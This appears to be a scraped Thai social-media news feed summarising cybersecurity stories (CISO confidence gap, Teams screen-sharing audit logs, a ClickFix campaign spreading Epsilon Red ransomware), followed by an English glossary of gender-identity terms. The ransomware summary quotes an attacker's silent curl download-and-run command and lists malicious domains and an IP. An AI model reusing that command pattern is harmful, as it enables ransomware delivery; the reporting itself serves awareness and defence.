    🧠 เรื่องเล่าจากข่าว: “ช่องว่างแห่งความมั่นใจ” ที่อาจทำให้องค์กรพังโดยไม่รู้ตัว รายงานจาก Bitdefender และ Darktrace ในปี 2025 เผยให้เห็นช่องว่างความเข้าใจระหว่างผู้บริหารด้านความปลอดภัย (CISO) กับทีมปฏิบัติการด้านไซเบอร์ (security practitioners) อย่างชัดเจน - 45% ของ CISO เชื่อว่าระบบขององค์กรสามารถรับมือกับภัยคุกคามได้ดี - แต่มีเพียง 19% ของผู้จัดการระดับกลางที่เห็นด้วย - และเมื่อพูดถึงภัยจาก AI มีถึง 62% ของผู้บริหารที่มั่นใจว่าจะรับมือได้ แต่ทีมปฏิบัติการกลับมั่นใจแค่ 49% เหตุผลหลักคือ ผู้บริหารมักดูข้อมูลจาก dashboard และรายงานสรุป ในขณะที่ทีมปฏิบัติการต้องรับมือกับความจริงที่ซับซ้อน เช่น ระบบเก่า, การแจ้งเตือนล้นระบบ, และการขาดทรัพยากร ผลที่ตามมาคือการลงทุนผิดจุด เช่น เน้น compliance มากกว่าการพัฒนาเครื่องมือรับมือภัยจริง และการประเมินความเสี่ยงที่ไม่ตรงกับความเป็นจริง ✅ CISO มั่นใจในความปลอดภัยขององค์กรมากกว่าทีมปฏิบัติการอย่างมีนัยสำคัญ ➡️ 45% ของผู้บริหารมั่นใจเทียบกับ 19% ของผู้จัดการระดับกลาง ➡️ ช่องว่างนี้ส่งผลต่อการจัดลำดับความสำคัญในการลงทุน ✅ ภัยคุกคามจาก AI ถูกประเมินต่ำเกินไปโดยผู้บริหาร ➡️ 62% ของผู้บริหารมั่นใจว่าจะรับมือได้ ➡️ แต่ทีมปฏิบัติการเห็นว่าระบบยังไม่พร้อม และขาดความเข้าใจใน AI ✅ ทีมปฏิบัติการเผชิญกับความเครียดจากการแจ้งเตือนล้นระบบและเครื่องมือที่ไม่เชื่อมโยงกัน ➡️ ทำให้มองเห็นปัญหาที่ผู้บริหารไม่เคยสัมผัส ➡️ เช่น legacy systems, alert fatigue, และ policy ที่ไม่สอดคล้องกัน ✅ การลงทุนมักเน้น compliance และ visibility มากกว่าการพัฒนา core capabilities ➡️ เช่น detection engineering, incident response, threat containment ➡️ ส่งผลให้ระบบไม่พร้อมรับมือภัยจริง ✅ Darktrace พบว่า 78% ของ CISO เห็นว่า AI มีผลกระทบต่อองค์กรอย่างมาก ➡️ แต่มีเพียง 42% ของผู้ปฏิบัติการที่เข้าใจว่า AI ในระบบคืออะไร ➡️ ช่องว่างความรู้ทำให้การใช้ AI เพื่อป้องกันภัยยังไม่เต็มประสิทธิภาพ https://www.csoonline.com/article/4031648/mind-the-overconfidence-gap-cisos-and-staff-dont-see-eye-to-eye-on-security-posture.html
    WWW.CSOONLINE.COM
    Mind the overconfidence gap: CISOs and staff don’t see eye to eye on security posture
    Security executives may be prone to believing cyber defenses are stronger than front-line staff see them to be, thereby distorting spending priorities and creating a false sense of security.
    0 ความคิดเห็น 0 การแบ่งปัน 103 มุมมอง 0 รีวิว
  • เรื่องเล่าจากข่าว: “ดูว่าใครแชร์อะไร กับใคร เมื่อไหร่”—Microsoft Teams เปิดให้ตรวจสอบการแชร์หน้าจอแล้ว

    ในเดือนกรกฎาคม 2025 Microsoft ได้เปิดตัวฟีเจอร์ใหม่ใน Microsoft Teams ที่ให้ผู้ดูแลระบบ (Teams admins) เข้าถึงข้อมูล telemetry และ audit logs สำหรับการแชร์หน้าจอ (screen sharing) และการควบคุมหน้าจอ (Take/Give/Request control) ได้โดยตรงผ่าน Microsoft Purview

    ข้อมูลที่สามารถตรวจสอบได้ ได้แก่:
    - ใครเริ่มแชร์หน้าจอ และเมื่อไหร่
    - แชร์ให้ใครดู
    - ใครขอควบคุมหน้าจอ และใครอนุญาต
    - เวลาเริ่มและหยุดการแชร์
    - การยอมรับคำขอควบคุมหน้าจอ

    ฟีเจอร์นี้ช่วยให้ผู้ดูแลระบบสามารถตรวจสอบพฤติกรรมต้องสงสัย เช่น การแชร์ข้อมูลลับกับบุคคลภายนอก หรือการเข้าควบคุมหน้าจอโดยไม่ได้รับอนุญาต

    การใช้งานทำได้ผ่าน Microsoft Purview โดยเลือกเมนู Audit → New Search แล้วกรอกคำค้น เช่น “screenShared” หรือ “MeetingParticipantDetail” เพื่อดูข้อมูลย้อนหลัง และสามารถ export เป็นไฟล์ CSV ได้

    Microsoft เปิดให้ Teams admins เข้าถึง audit logs สำหรับการแชร์หน้าจอผ่าน Microsoft Purview
    ตรวจสอบได้ว่าใครแชร์หน้าจอ, แชร์ให้ใคร, และเมื่อไหร่
    รองรับการตรวจสอบคำสั่ง Take, Give, Request control

    ข้อมูล telemetry ช่วยให้ตรวจสอบพฤติกรรมต้องสงสัยได้แบบละเอียด
    เช่น การแชร์ข้อมูลลับกับบุคคลภายนอก
    หรือการควบคุมหน้าจอโดยไม่ได้รับอนุญาต

    การใช้งานทำผ่าน Microsoft Purview โดยเลือก Audit → New Search
    ใช้คำค้น “screenShared” หรือ “MeetingParticipantDetail”
    สามารถ export ข้อมูลเป็น CSV ได้

    ฟีเจอร์นี้เปิดให้ใช้งานแล้วสำหรับผู้ดูแลระบบทุกคน
    ไม่จำกัดเฉพาะองค์กรขนาดใหญ่
    ใช้ได้ทั้งใน Teams เวอร์ชัน desktop, web และ mobile

    Microsoft Purview เป็นแพลตฟอร์มรวมสำหรับการจัดการความปลอดภัยของข้อมูล
    รองรับการตรวจสอบ, ป้องกันการรั่วไหล, และการเข้ารหัสข้อมูล
    ใช้ร่วมกับ Microsoft 365, Edge, Windows/macOS และเครือข่าย HTTPS

    ฟีเจอร์ “Detect sensitive content during screen sharing” ช่วยแจ้งเตือนเมื่อมีข้อมูลลับปรากฏบนหน้าจอ
    เช่น หมายเลขบัตรเครดิต, เลขประจำตัวประชาชน, หรือข้อมูลภาษี
    ผู้ใช้จะได้รับแจ้งเตือนและสามารถหยุดการแชร์ได้ทันที

    Microsoft Purview รองรับการป้องกันข้อมูลด้วย sensitivity labels และ Double Key Encryption
    ช่วยให้ข้อมูลถูกเข้ารหัสและควบคุมการเข้าถึงได้ตามระดับความลับ
    เหมาะกับองค์กรที่ต้องการปฏิบัติตามข้อกำหนดด้านความปลอดภัยและกฎหมาย

    การเปิดเผยข้อมูล telemetry อาจถูกนำไปใช้ผิดวัตถุประสงค์ได้ หากไม่มีการควบคุมสิทธิ์อย่างเหมาะสม
    ผู้ดูแลระบบที่ไม่มีจรรยาบรรณอาจใช้ข้อมูลเพื่อสอดแนมหรือกดดันพนักงาน
    ควรมีการกำหนดสิทธิ์และนโยบายการเข้าถึงอย่างชัดเจน

    การแชร์หน้าจอโดยไม่ระวังอาจทำให้ข้อมูลลับรั่วไหลได้ง่าย
    เช่น การเปิดเอกสารภายในหรือข้อมูลลูกค้าระหว่างประชุมกับบุคคลภายนอก
    ควรมีการแจ้งเตือนหรือระบบตรวจจับเนื้อหาลับระหว่างการแชร์

    การใช้ฟีเจอร์นี้ต้องเปิด auditing ใน Microsoft Purview ก่อน
    หากไม่ได้เปิด auditing จะไม่สามารถดูข้อมูลย้อนหลังได้
    ข้อมูลจะถูกเก็บตั้งแต่วันที่เปิด auditing เท่านั้น

    การตรวจสอบข้อมูลย้อนหลังมีข้อจำกัดตามระดับ license ของ Microsoft 365
    ระยะเวลาการเก็บข้อมูล audit log ขึ้นอยู่กับประเภท license
    ผู้ใช้ทั่วไปอาจไม่สามารถเข้าถึงข้อมูลย้อนหลังได้ครบถ้วน

    https://www.neowin.net/news/teams-admins-will-now-be-able-to-see-telemetry-for-screen-sharing/
    🧠 เรื่องเล่าจากข่าว: “ดูว่าใครแชร์อะไร กับใคร เมื่อไหร่”—Microsoft Teams เปิดให้ตรวจสอบการแชร์หน้าจอแล้ว ในเดือนกรกฎาคม 2025 Microsoft ได้เปิดตัวฟีเจอร์ใหม่ใน Microsoft Teams ที่ให้ผู้ดูแลระบบ (Teams admins) เข้าถึงข้อมูล telemetry และ audit logs สำหรับการแชร์หน้าจอ (screen sharing) และการควบคุมหน้าจอ (Take/Give/Request control) ได้โดยตรงผ่าน Microsoft Purview ข้อมูลที่สามารถตรวจสอบได้ ได้แก่: - ใครเริ่มแชร์หน้าจอ และเมื่อไหร่ - แชร์ให้ใครดู - ใครขอควบคุมหน้าจอ และใครอนุญาต - เวลาเริ่มและหยุดการแชร์ - การยอมรับคำขอควบคุมหน้าจอ ฟีเจอร์นี้ช่วยให้ผู้ดูแลระบบสามารถตรวจสอบพฤติกรรมต้องสงสัย เช่น การแชร์ข้อมูลลับกับบุคคลภายนอก หรือการเข้าควบคุมหน้าจอโดยไม่ได้รับอนุญาต การใช้งานทำได้ผ่าน Microsoft Purview โดยเลือกเมนู Audit → New Search แล้วกรอกคำค้น เช่น “screenShared” หรือ “MeetingParticipantDetail” เพื่อดูข้อมูลย้อนหลัง และสามารถ export เป็นไฟล์ CSV ได้ ✅ Microsoft เปิดให้ Teams admins เข้าถึง audit logs สำหรับการแชร์หน้าจอผ่าน Microsoft Purview ➡️ ตรวจสอบได้ว่าใครแชร์หน้าจอ, แชร์ให้ใคร, และเมื่อไหร่ ➡️ รองรับการตรวจสอบคำสั่ง Take, Give, Request control ✅ ข้อมูล telemetry ช่วยให้ตรวจสอบพฤติกรรมต้องสงสัยได้แบบละเอียด ➡️ เช่น การแชร์ข้อมูลลับกับบุคคลภายนอก ➡️ หรือการควบคุมหน้าจอโดยไม่ได้รับอนุญาต ✅ การใช้งานทำผ่าน Microsoft Purview โดยเลือก Audit → New Search ➡️ ใช้คำค้น “screenShared” หรือ “MeetingParticipantDetail” ➡️ สามารถ export ข้อมูลเป็น CSV ได้ ✅ ฟีเจอร์นี้เปิดให้ใช้งานแล้วสำหรับผู้ดูแลระบบทุกคน ➡️ ไม่จำกัดเฉพาะองค์กรขนาดใหญ่ ➡️ ใช้ได้ทั้งใน Teams เวอร์ชัน desktop, web และ mobile ✅ Microsoft Purview เป็นแพลตฟอร์มรวมสำหรับการจัดการความปลอดภัยของข้อมูล ➡️ รองรับการตรวจสอบ, ป้องกันการรั่วไหล, และการเข้ารหัสข้อมูล ➡️ ใช้ร่วมกับ Microsoft 365, Edge, Windows/macOS และเครือข่าย HTTPS ✅ ฟีเจอร์ “Detect sensitive content during screen sharing” ช่วยแจ้งเตือนเมื่อมีข้อมูลลับปรากฏบนหน้าจอ ➡️ เช่น หมายเลขบัตรเครดิต, เลขประจำตัวประชาชน, หรือข้อมูลภาษี ➡️ ผู้ใช้จะได้รับแจ้งเตือนและสามารถหยุดการแชร์ได้ทันที ✅ Microsoft Purview รองรับการป้องกันข้อมูลด้วย sensitivity labels และ Double Key Encryption ➡️ ช่วยให้ข้อมูลถูกเข้ารหัสและควบคุมการเข้าถึงได้ตามระดับความลับ ➡️ เหมาะกับองค์กรที่ต้องการปฏิบัติตามข้อกำหนดด้านความปลอดภัยและกฎหมาย ‼️ การเปิดเผยข้อมูล telemetry อาจถูกนำไปใช้ผิดวัตถุประสงค์ได้ หากไม่มีการควบคุมสิทธิ์อย่างเหมาะสม ⛔ ผู้ดูแลระบบที่ไม่มีจรรยาบรรณอาจใช้ข้อมูลเพื่อสอดแนมหรือกดดันพนักงาน ⛔ ควรมีการกำหนดสิทธิ์และนโยบายการเข้าถึงอย่างชัดเจน ‼️ การแชร์หน้าจอโดยไม่ระวังอาจทำให้ข้อมูลลับรั่วไหลได้ง่าย ⛔ เช่น การเปิดเอกสารภายในหรือข้อมูลลูกค้าระหว่างประชุมกับบุคคลภายนอก ⛔ ควรมีการแจ้งเตือนหรือระบบตรวจจับเนื้อหาลับระหว่างการแชร์ ‼️ การใช้ฟีเจอร์นี้ต้องเปิด auditing ใน Microsoft Purview ก่อน ⛔ หากไม่ได้เปิด auditing จะไม่สามารถดูข้อมูลย้อนหลังได้ ⛔ ข้อมูลจะถูกเก็บตั้งแต่วันที่เปิด auditing เท่านั้น ‼️ การตรวจสอบข้อมูลย้อนหลังมีข้อจำกัดตามระดับ license ของ Microsoft 365 ⛔ ระยะเวลาการเก็บข้อมูล audit log ขึ้นอยู่กับประเภท license ⛔ ผู้ใช้ทั่วไปอาจไม่สามารถเข้าถึงข้อมูลย้อนหลังได้ครบถ้วน https://www.neowin.net/news/teams-admins-will-now-be-able-to-see-telemetry-for-screen-sharing/
    WWW.NEOWIN.NET
    Teams admins will now be able to see telemetry for screen sharing
    To improve the cybersecurity posture of an organization, Microsoft is introducing audit logs for screen sharing sessions, accessible through Purview.
    0 ความคิดเห็น 0 การแบ่งปัน 122 มุมมอง 0 รีวิว
  • เรื่องเล่าจากข่าว: “ClickFix” กับกับดักปลอมที่เปิดทางให้ Epsilon Red เข้าระบบคุณ

    ตั้งแต่เดือนกรกฎาคม 2025 แฮกเกอร์เริ่มใช้หน้าเว็บปลอมที่ดูเหมือนระบบยืนยันตัวตนจากแพลตฟอร์มดัง เช่น Discord, Twitch, Kick และ OnlyFans โดยอ้างว่าเป็น “ClickFix verification” เพื่อหลอกให้ผู้ใช้ดาวน์โหลดไฟล์ .HTA ซึ่งเป็นไฟล์ HTML ที่สามารถรันสคริปต์ได้ใน Windows

    เมื่อผู้ใช้คลิก “ยืนยันตัวตน” หน้าเว็บจะเปิดอีกหน้าที่แอบรันคำสั่งผ่าน ActiveXObject เช่น WScript.Shell เพื่อดาวน์โหลดไฟล์ ransomware จากเซิร์ฟเวอร์ของแฮกเกอร์ แล้วรันแบบเงียบ ๆ โดยไม่แสดงหน้าต่างใด ๆ

    เทคนิคนี้ต่างจากเวอร์ชันเก่าที่ใช้การคัดลอกคำสั่งไปยัง clipboard—เพราะเวอร์ชันใหม่นี้รันคำสั่งโดยตรงผ่านเบราว์เซอร์ ทำให้หลบเลี่ยงระบบป้องกันได้ง่ายขึ้น

    Epsilon Red ransomware จะเข้ารหัสไฟล์ทั้งหมดในเครื่อง และทิ้งข้อความเรียกค่าไถ่ที่มีสไตล์คล้าย REvil แต่มีการปรับปรุงด้านไวยากรณ์เล็กน้อย

    Epsilon Red ransomware ถูกแพร่ผ่านไฟล์ .HTA ที่แฝงอยู่ในหน้าเว็บปลอมชื่อ “ClickFix”
    หน้าเว็บปลอมอ้างว่าเป็นระบบยืนยันตัวตนจาก Discord, Twitch, Kick, OnlyFans
    หลอกให้ผู้ใช้คลิกและรันไฟล์ .HTA ที่มีสคริปต์อันตราย

    ไฟล์ .HTA ใช้ ActiveXObject เพื่อรันคำสั่งผ่าน Windows Script Host (WSH)
    เช่น shell.Run("cmd /c curl -s -o a.exe ... && a.exe", 0)
    ดาวน์โหลดไฟล์ ransomware และรันแบบเงียบโดยไม่เปิดหน้าต่าง

    แฮกเกอร์ใช้เทคนิค social engineering เช่นข้อความยืนยันปลอมเพื่อหลอกผู้ใช้
    เช่น “Your Verificatification Code Is: PC-19fj5e9i-cje8i3e4” พร้อม typo จงใจให้ดูไม่อันตราย
    ใช้คำสั่ง pause เพื่อให้หน้าต่างค้างไว้ดูเหมือนระบบจริง

    Epsilon Red ransomware เข้ารหัสไฟล์ทั้งหมดในเครื่องและทิ้งข้อความเรียกค่าไถ่
    มีลักษณะคล้าย REvil แต่ไม่มีความเกี่ยวข้องโดยตรง
    ใช้ PowerShell scripts หลายตัวเพื่อเตรียมระบบก่อนเข้ารหัส

    โครงสร้างแคมเปญมีการปลอมตัวเป็นบริการยอดนิยมและใช้ IP/โดเมนเฉพาะในการโจมตี
    เช่น twtich[.]cc, capchabot[.]cc และ IP 155.94.155.227:2269
    มีการใช้ Quasar RAT ร่วมด้วยในบางกรณี

    ผู้ใช้ที่เปิดไฟล์ .HTA หรือใช้ Internet Explorer มีความเสี่ยงสูงมาก
    ActiveX ยังเปิดใช้งานในบางระบบ Windows โดยไม่รู้ตัว
    การรันคำสั่งผ่านเบราว์เซอร์สามารถหลบเลี่ยง SmartScreen และระบบป้องกันทั่วไป

    องค์กรที่อนุญาตให้ใช้ปลั๊กอินเบราว์เซอร์หรือไม่จำกัดการเข้าถึงเว็บมีความเสี่ยงสูง
    ผู้ใช้สามารถเข้าถึงหน้า ClickFix ปลอมและรันไฟล์ได้โดยไม่รู้ตัว
    Endpoint อาจถูกเข้ารหัสและเรียกค่าไถ่ทันที

    การใช้ social engineering แบบปลอมตัวเป็นบริการยอดนิยมทำให้ผู้ใช้ตกหลุมพรางง่ายขึ้น
    ผู้ใช้เชื่อว่าเป็นการยืนยันตัวตนจริงจาก Discord หรือ Twitch
    ไม่สงสัยว่าเป็นการโจมตีเพราะหน้าตาเว็บดูน่าเชื่อถือ

    ระบบป้องกันแบบเดิมไม่สามารถตรวจจับการรันคำสั่งผ่าน ActiveX ได้ทันเวลา
    การรันแบบเงียบไม่แสดงหน้าต่างหรือแจ้งเตือน
    ไฟล์ถูกดาวน์โหลดและรันในหน่วยความจำโดยไม่มีร่องรอย

    https://hackread.com/onlyfans-discord-clickfix-pages-epsilon-red-ransomware/
    🧠 เรื่องเล่าจากข่าว: “ClickFix” กับกับดักปลอมที่เปิดทางให้ Epsilon Red เข้าระบบคุณ ตั้งแต่เดือนกรกฎาคม 2025 แฮกเกอร์เริ่มใช้หน้าเว็บปลอมที่ดูเหมือนระบบยืนยันตัวตนจากแพลตฟอร์มดัง เช่น Discord, Twitch, Kick และ OnlyFans โดยอ้างว่าเป็น “ClickFix verification” เพื่อหลอกให้ผู้ใช้ดาวน์โหลดไฟล์ .HTA ซึ่งเป็นไฟล์ HTML ที่สามารถรันสคริปต์ได้ใน Windows เมื่อผู้ใช้คลิก “ยืนยันตัวตน” หน้าเว็บจะเปิดอีกหน้าที่แอบรันคำสั่งผ่าน ActiveXObject เช่น WScript.Shell เพื่อดาวน์โหลดไฟล์ ransomware จากเซิร์ฟเวอร์ของแฮกเกอร์ แล้วรันแบบเงียบ ๆ โดยไม่แสดงหน้าต่างใด ๆ เทคนิคนี้ต่างจากเวอร์ชันเก่าที่ใช้การคัดลอกคำสั่งไปยัง clipboard—เพราะเวอร์ชันใหม่นี้รันคำสั่งโดยตรงผ่านเบราว์เซอร์ ทำให้หลบเลี่ยงระบบป้องกันได้ง่ายขึ้น Epsilon Red ransomware จะเข้ารหัสไฟล์ทั้งหมดในเครื่อง และทิ้งข้อความเรียกค่าไถ่ที่มีสไตล์คล้าย REvil แต่มีการปรับปรุงด้านไวยากรณ์เล็กน้อย ✅ Epsilon Red ransomware ถูกแพร่ผ่านไฟล์ .HTA ที่แฝงอยู่ในหน้าเว็บปลอมชื่อ “ClickFix” ➡️ หน้าเว็บปลอมอ้างว่าเป็นระบบยืนยันตัวตนจาก Discord, Twitch, Kick, OnlyFans ➡️ หลอกให้ผู้ใช้คลิกและรันไฟล์ .HTA ที่มีสคริปต์อันตราย ✅ ไฟล์ .HTA ใช้ ActiveXObject เพื่อรันคำสั่งผ่าน Windows Script Host (WSH) ➡️ เช่น shell.Run("cmd /c curl -s -o a.exe ... && a.exe", 0) ➡️ ดาวน์โหลดไฟล์ ransomware และรันแบบเงียบโดยไม่เปิดหน้าต่าง ✅ แฮกเกอร์ใช้เทคนิค social engineering เช่นข้อความยืนยันปลอมเพื่อหลอกผู้ใช้ ➡️ เช่น “Your Verificatification Code Is: PC-19fj5e9i-cje8i3e4” พร้อม typo จงใจให้ดูไม่อันตราย ➡️ ใช้คำสั่ง pause เพื่อให้หน้าต่างค้างไว้ดูเหมือนระบบจริง ✅ Epsilon Red ransomware เข้ารหัสไฟล์ทั้งหมดในเครื่องและทิ้งข้อความเรียกค่าไถ่ ➡️ มีลักษณะคล้าย REvil แต่ไม่มีความเกี่ยวข้องโดยตรง ➡️ ใช้ PowerShell scripts หลายตัวเพื่อเตรียมระบบก่อนเข้ารหัส ✅ โครงสร้างแคมเปญมีการปลอมตัวเป็นบริการยอดนิยมและใช้ IP/โดเมนเฉพาะในการโจมตี ➡️ เช่น twtich[.]cc, capchabot[.]cc และ IP 155.94.155.227:2269 ➡️ มีการใช้ Quasar RAT ร่วมด้วยในบางกรณี ‼️ ผู้ใช้ที่เปิดไฟล์ .HTA หรือใช้ Internet Explorer มีความเสี่ยงสูงมาก ⛔ ActiveX ยังเปิดใช้งานในบางระบบ Windows โดยไม่รู้ตัว ⛔ การรันคำสั่งผ่านเบราว์เซอร์สามารถหลบเลี่ยง SmartScreen และระบบป้องกันทั่วไป ‼️ องค์กรที่อนุญาตให้ใช้ปลั๊กอินเบราว์เซอร์หรือไม่จำกัดการเข้าถึงเว็บมีความเสี่ยงสูง ⛔ ผู้ใช้สามารถเข้าถึงหน้า ClickFix ปลอมและรันไฟล์ได้โดยไม่รู้ตัว ⛔ Endpoint อาจถูกเข้ารหัสและเรียกค่าไถ่ทันที ‼️ การใช้ social engineering แบบปลอมตัวเป็นบริการยอดนิยมทำให้ผู้ใช้ตกหลุมพรางง่ายขึ้น ⛔ ผู้ใช้เชื่อว่าเป็นการยืนยันตัวตนจริงจาก Discord หรือ Twitch ⛔ ไม่สงสัยว่าเป็นการโจมตีเพราะหน้าตาเว็บดูน่าเชื่อถือ ‼️ ระบบป้องกันแบบเดิมไม่สามารถตรวจจับการรันคำสั่งผ่าน ActiveX ได้ทันเวลา ⛔ การรันแบบเงียบไม่แสดงหน้าต่างหรือแจ้งเตือน ⛔ ไฟล์ถูกดาวน์โหลดและรันในหน่วยความจำโดยไม่มีร่องรอย https://hackread.com/onlyfans-discord-clickfix-pages-epsilon-red-ransomware/
    HACKREAD.COM
    OnlyFans, Discord ClickFix-Themed Pages Spread Epsilon Red Ransomware
    Follow us on Bluesky, Twitter (X), Mastodon and Facebook at @Hackread
    0 ความคิดเห็น 0 การแบ่งปัน 96 มุมมอง 0 รีวิว
  • Demigender, Maverique, And Other Gender Terms You May Not Know

    The language of queer identity is constantly evolving and expanding, and there will always be new terminology to learn. Pride Month is the perfect opportunity to increase understanding and awareness of the kind of emerging and newly prominent terms that we’re constantly adding to our Gender and Sexuality Dictionary.

    Language is an important part of how queer people, and particularly nonbinary and trans people, express and define their experience and who they are, whether it’s through the use of new terms or new applications of existing terms.

    Finding or coining the term that precisely reflects personal experience and identity can help a person to feel seen, accepted, or understood. It can be liberating and empowering both individually and in a way that creates community. And learning these terms helps to promote inclusion and respect.
    The explanations of the terms provided here are meant to capture the ways that most people use them. But it’s important to note that many of these terms can be and are applied in different—and equally valid—ways, with nuances and interpretations varying from person to person. It’s also important to emphasize that this list is not meant to be exhaustive—it simply covers some of the terms that have become increasingly visible in the discussion of the diverse expanse of gender.

    demigender
    Demigender is an umbrella term for people who identify partly, but not fully, with a certain gender. The prefix demi- means “half.” People who identify as demigender may use identifying terms like demigirl or demiboy.

    Demigender is distinct from bigender, which indicates two genders or a combination of two. The term demigender is sometimes considered to overlap with genderflux, which is used by people who experience a range of intensity within a gender identity.

    This means that a genderflux individual may experience the feeling of multiple genders on any given day (or moment). The term gender-fluid is sometimes used synonymously with genderflux.

    femme
    The word femme, occasionally spelled fem, comes from the French word for “woman.” It was first adopted into English to mean simply “woman” or “wife.” However, by the 1960s, it came to refer to “a lesbian who embraces identity markers that are associated with traditional expressions of femininity.” This sense of femme is often contrasted with butch, “a lesbian who embraces identity markers that are associated with traditional expressions of masculinity.”

    Separate from this long-standing sense, the term femme has taken on a broader meaning in recent years. Femme is now also used to mean “any person who adopts a feminine appearance, manner, or persona.” This meaning of femme is inclusive of all genders with a feminine aspect—it may be used by someone who identifies as a trans woman or a demigirl, for example.

    xenogender
    When it comes to expressions of gender, there are many terms that go “beyond the binary” of masculine and feminine identities. One example is xenogender, an umbrella term for nonbinary genders that do not relate to the categories of “female” or “male.” Such gender identities are often expressed by attaching -gender to a word (often a noun) that’s representative of it, like an animal, concept, or symbol, such as staticgender or sciencegender.

    The combining form xeno- means “alien” or “strange,” from the Greek xénos, meaning “stranger, guest.” Xenogender is meant to indicate a person’s sense of their gender as being completely unrelated to typical gender identities. Early uses of the term xenogender are thought to have emerged around 2017, with an increase in use beginning around 2020. Still, awareness of the term is relatively low.

    neutrois
    Like xenogender, neutrois refers to a gender identity that does not relate to male or female identities. Neutrois people are non-gendered and may transition away from having physical signifiers traditionally associated with gender expression. This is distinct from an androgynous identity, in which a person has “both masucline and feminine gender characteristics.” According to Neutrois Outpost, a website dedicated to neutrois people, the word neutrois was coined by H.A. Burnham in the 1990s. The origin of neutrois is unclear, but it is likely related to the French neutre, meaning “neuter, neither masculine nor feminine,” and trois, “three,” a reference to it representing a third gender.

    aporagender
    Another nonbinary gender identity is aporagender. Aporagender is distinct from male, female, or any gender along the binary spectrum, but still involves experiencing a strong gender identity. Like xenogender identities, aporagender identities are connected to an identity beyond a binary. This makes aporagender people different from neutrois people in that they have a gender identity.

    The word aporagender is thought to have been coined in 2014 by a user of the website Tumblr. The apora- part of the word comes from the Greek apó, meaning “away off, apart,” or “separate.” In other words, aporagender is a “separate gender,” neither male nor female nor anything in between.

    maverique
    Like aporagender, maverique was coined in 2014 by a Tumblr user, Vesper H., who defines the term on their FAQ page as an “inner conviction regarding a sense of self that is entirely independent of male/masculinity, female/femininity or anything which derives from the two while still being neither without gender, nor of a neutral gender.” In this way, a maverique gender is said to be unique and separate from the gender binary.

    The term comes from a combination of the English maverick, referring to someone who is “unorthodox” or “nonconformist,” and the French suffix -ique, meaning “having some characteristics of” or “-like,” similar to the English -ic. Maverique can be pronounced either [ mav-reek ] or [ mav-uh–reek ].

    gendervoid
    Another set of gender identities that falls under the nonbinary umbrella is gendervoid, referring to the sense that there is “an empty space,” a void, where a gender identity would be. Those who identify as gendervoid may feel unable to experience gender. When describing gender identity, void- can also be used as a prefix, as in voidboy or voidgirl, which are used for a person who identifies with some aspect of masculinity or femininity while also experiencing a gender “void.” The term is sometimes used synonymously with agender, but some make the distinction that agender represents gender neutrality while gendervoid represents a complete lack of gender.

    māhū
    Within Native Hawaiian and Tahitian cultures, the gender identity said to be between male and female is known as māhū [ ma-hoo ]. Traditionally, māhū people were highly respected in their communities for their knowledge of rituals and healing practices. While historically māhū people have faced marginalization and discrimination, there is growing recognition of them and their contributions to the life and culture of their communities.

    hijra
    While there is a variety of third genders in many cultures throughout the Indian subcontinent, one of the more common ones is hijra [ hij–ruh ], referring to “a person whose gender identity is neither male nor female, typically a person who was assigned male at birth but whose gender expression is female.” It can also more generally refer to a transgender person.

    Members of the hijra community often live apart from other communities. Believed by many Hindus to have particular religious power due to their gender, the hijra are often hired to perform dances and blessings at momentous occasions, such as weddings and births.

    fa’afafine and fa’afatama
    In Samoan culture, both in Samoa and in Samoan communities around the world, the terms fa’afafine [ fa-af-ah-feen-eh ] and fa’afatama [ fa-af-ah–tah-mah ] are used to refer to those who express both masculine and feminine gender characteristics. Fa’afafine refers to a person assigned male at birth with female characteristics, while fa’afatama refers to a person assigned female at birth with male characteristics. The prefix fa’a- means “in the manner of,” while fafine means “woman” and fatama means “man.”

    Fa’afafine and fa’afatama people are particularly noted for their role as a ceremonial host—or taupou—during rituals.

    It is important to note that māhū, hijra, fa’afafine, and fa’afatama are connected to specific cultural conceptions of gender and, as such, are not directly analogous to each other or other terms used by transgender people.

    These are only a few of the many terms you may encounter in the discussion and expression of gender identity. You can find many more in Gender and Sexuality Dictionary, which it regularly update with new terms and meanings to reflect evolving terminology.

    © 2025, Aakkhra, All rights reserved.
    Demigender, Maverique, And Other Gender Terms You May Not Know The language of queer identity is constantly evolving and expanding, and there will always be new terminology to learn. Pride Month is the perfect opportunity to increase understanding and awareness of the kind of emerging and newly prominent terms that we’re constantly adding to our Gender and Sexuality Dictionary. Language is an important part of how queer people, and particularly nonbinary and trans people, express and define their experience and who they are, whether it’s through the use of new terms or new applications of existing terms. Finding or coining the term that precisely reflects personal experience and identity can help a person to feel seen, accepted, or understood. It can be liberating and empowering both individually and in a way that creates community. And learning these terms helps to promote inclusion and respect. The explanations of the terms provided here are meant to capture the ways that most people use them. But it’s important to note that many of these terms can be and are applied in different—and equally valid—ways, with nuances and interpretations varying from person to person. It’s also important to emphasize that this list is not meant to be exhaustive—it simply covers some of the terms that have become increasingly visible in the discussion of the diverse expanse of gender. demigender Demigender is an umbrella term for people who identify partly, but not fully, with a certain gender. The prefix demi- means “half.” People who identify as demigender may use identifying terms like demigirl or demiboy. Demigender is distinct from bigender, which indicates two genders or a combination of two. The term demigender is sometimes considered to overlap with genderflux, which is used by people who experience a range of intensity within a gender identity. This means that a genderflux individual may experience the feeling of multiple genders on any given day (or moment). The term gender-fluid is sometimes used synonymously with genderflux. femme The word femme, occasionally spelled fem, comes from the French word for “woman.” It was first adopted into English to mean simply “woman” or “wife.” However, by the 1960s, it came to refer to “a lesbian who embraces identity markers that are associated with traditional expressions of femininity.” This sense of femme is often contrasted with butch, “a lesbian who embraces identity markers that are associated with traditional expressions of masculinity.” Separate from this long-standing sense, the term femme has taken on a broader meaning in recent years. Femme is now also used to mean “any person who adopts a feminine appearance, manner, or persona.” This meaning of femme is inclusive of all genders with a feminine aspect—it may be used by someone who identifies as a trans woman or a demigirl, for example. xenogender When it comes to expressions of gender, there are many terms that go “beyond the binary” of masculine and feminine identities. One example is xenogender, an umbrella term for nonbinary genders that do not relate to the categories of “female” or “male.” Such gender identities are often expressed by attaching -gender to a word (often a noun) that’s representative of it, like an animal, concept, or symbol, such as staticgender or sciencegender. The combining form xeno- means “alien” or “strange,” from the Greek xénos, meaning “stranger, guest.” Xenogender is meant to indicate a person’s sense of their gender as being completely unrelated to typical gender identities. Early uses of the term xenogender are thought to have emerged around 2017, with an increase in use beginning around 2020. Still, awareness of the term is relatively low. neutrois Like xenogender, neutrois refers to a gender identity that does not relate to male or female identities. Neutrois people are non-gendered and may transition away from having physical signifiers traditionally associated with gender expression. This is distinct from an androgynous identity, in which a person has “both masucline and feminine gender characteristics.” According to Neutrois Outpost, a website dedicated to neutrois people, the word neutrois was coined by 